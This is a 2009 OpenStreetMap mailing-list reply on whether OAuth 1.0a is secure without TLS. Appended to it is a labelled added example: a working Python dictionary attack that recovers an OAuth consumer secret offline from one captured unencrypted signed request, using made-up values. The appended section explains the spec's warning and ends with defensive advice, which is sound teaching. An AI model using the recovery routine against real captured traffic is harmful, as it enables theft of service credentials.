[OSM-talk] Why doesn't OSM implement a simple measure to protect its users and passwords?
Anthony
osm at inbox.org
Sat Dec 26 02:06:45 GMT 2009
On Fri, Dec 25, 2009 at 8:52 PM, Lars Francke <lars.francke at gmail.com> wrote:
> The Resource Owner Authorization[4] as well as the exchange of the
> shared secret will need to be done using a secure method (SSL/TLS) but
> that doesn't mean that OAuth 1.0a or OAuth WRAP aren't valid
> authentication/authorization mechanisms. It just means that there is a
> way to implement it in an insecure way.
>
Okay, but isn't OAuth being presented as an alternative to SSL?
What I got from a quick read of the spec (http://oauth.net/core/1.0a/) is
this: "Unless a transport-layer security protocol is used, eavesdroppers
will have full access to OAuth requests and signatures, and will thus be
able to mount offline brute-force attacks to recover the Consumer's
credentials used."
I'd imagine a large number of OSM passwords can be easily brute forced given
offline access.
Not that I think it much matters. I agree with Steve that stealing OSM
passwords isn't that big of a deal.
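Added example, not part of the post above and not code from OSM or the OAuth project: it shows concretely what the quoted OAuth 1.0a sentence means. An OAuth 1.0a HMAC-SHA1 signature is computed over a base string built entirely from material that travels in the clear (method, URL, query/body parameters, oauth_* parameters), keyed with consumer_secret "&" token_secret. Anyone who captured one unencrypted request therefore has everything needed to test candidate secrets offline, at the cost of one HMAC per guess and no further traffic. The endpoint URL, consumer key, nonce, timestamp and wordlist below are all constructed; the capture is assumed to be the temporary-credentials request (the first step of the OAuth 1.0a dance), where the token secret is still empty so the signing key depends on the consumer secret alone.

```python
"""Added example: why an OAuth 1.0a HMAC-SHA1 request sent without TLS
lets an eavesdropper brute-force the consumer secret offline.
Constructed for this thread; not code from OSM or the original poster."""
import base64
import hashlib
import hmac
import secrets
from urllib.parse import quote


def pct(s: str) -> str:
    """RFC 3986 percent-encoding as OAuth 1.0a requires: only
    ALPHA, DIGIT, '-', '.', '_' and '~' are left unencoded."""
    return quote(s, safe="-._~")


def signature_base_string(method, base_url, params):
    """OAuth 1.0a signature base string (RFC 5849 section 3.4.1).

    params: (name, value) pairs gathered from the query string, the form
    body and the oauth_* parameters.  oauth_signature is excluded;
    duplicate names are allowed and ordered by value, as the spec says."""
    pairs = sorted((pct(k), pct(v)) for k, v in params if k != "oauth_signature")
    normalized = "&".join(f"{k}={v}" for k, v in pairs)
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def hmac_sha1_signature(base_string, consumer_secret, token_secret=""):
    """The signing key is consumer_secret '&' token_secret (both
    percent-encoded); the user's password never enters the computation."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    mac = hmac.new(key, base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(mac).decode()


def sign_request(method, base_url, params, consumer_secret, token_secret=""):
    """Return the parameter list with oauth_signature_method and
    oauth_signature appended, as a client would send it on the wire."""
    signed = list(params) + [("oauth_signature_method", "HMAC-SHA1")]
    sig = hmac_sha1_signature(signature_base_string(method, base_url, signed),
                              consumer_secret, token_secret)
    return signed + [("oauth_signature", sig)]


def recover_consumer_secret(method, base_url, captured, token_secret, candidates):
    """Offline dictionary attack.  Everything in the base string was
    visible in the plaintext capture, so each guess costs one HMAC and
    sends nothing to the server."""
    base = signature_base_string(method, base_url, captured)
    target = dict(captured)["oauth_signature"]
    for guess in candidates:
        if hmac.compare_digest(hmac_sha1_signature(base, guess, token_secret), target):
            return guess
    return None


# Constructed capture (hypothetical endpoint and values): a temporary-
# credentials request, where the token secret is still empty, so the
# signing key depends on the consumer secret alone.
CAPTURED_METHOD = "POST"
CAPTURED_URL = "http://api.example.org/oauth/request_token"
CAPTURED_PARAMS = [
    ("oauth_consumer_key", "osm-editor-demo"),
    ("oauth_nonce", "8f3a1c9d"),
    ("oauth_timestamp", "1261789605"),
    ("oauth_version", "1.0"),
    ("oauth_callback", "oob"),
]
WORDLIST = ["password", "123456", "openstreetmap", "letmein", "mapper2009"]


def demo():
    """Weak secret: recovered from one capture.  Random 128-bit secret: not."""
    weak_capture = sign_request(CAPTURED_METHOD, CAPTURED_URL, CAPTURED_PARAMS, "letmein")
    found = recover_consumer_secret(CAPTURED_METHOD, CAPTURED_URL, weak_capture, "", WORDLIST)

    strong_capture = sign_request(CAPTURED_METHOD, CAPTURED_URL, CAPTURED_PARAMS,
                                  secrets.token_hex(16))
    missed = recover_consumer_secret(CAPTURED_METHOD, CAPTURED_URL, strong_capture, "", WORDLIST)
    return found, missed


if __name__ == "__main__":
    print(demo())  # ('letmein', None)
```

Two practical points follow from the code. First, what the eavesdropper recovers is the consumer secret (and, for later requests, the token secret), not the user's OSM password; the password is only sent during the browser-side authorization step, which is exactly why the spec and Lars both say that step needs TLS. Second, the attack is cheap only when the secret is guessable: a consumer secret generated like `secrets.token_hex(16)` is outside any wordlist, whereas a human-chosen one falls in seconds, so the defence is random secrets plus TLS on the wire, not one or the other.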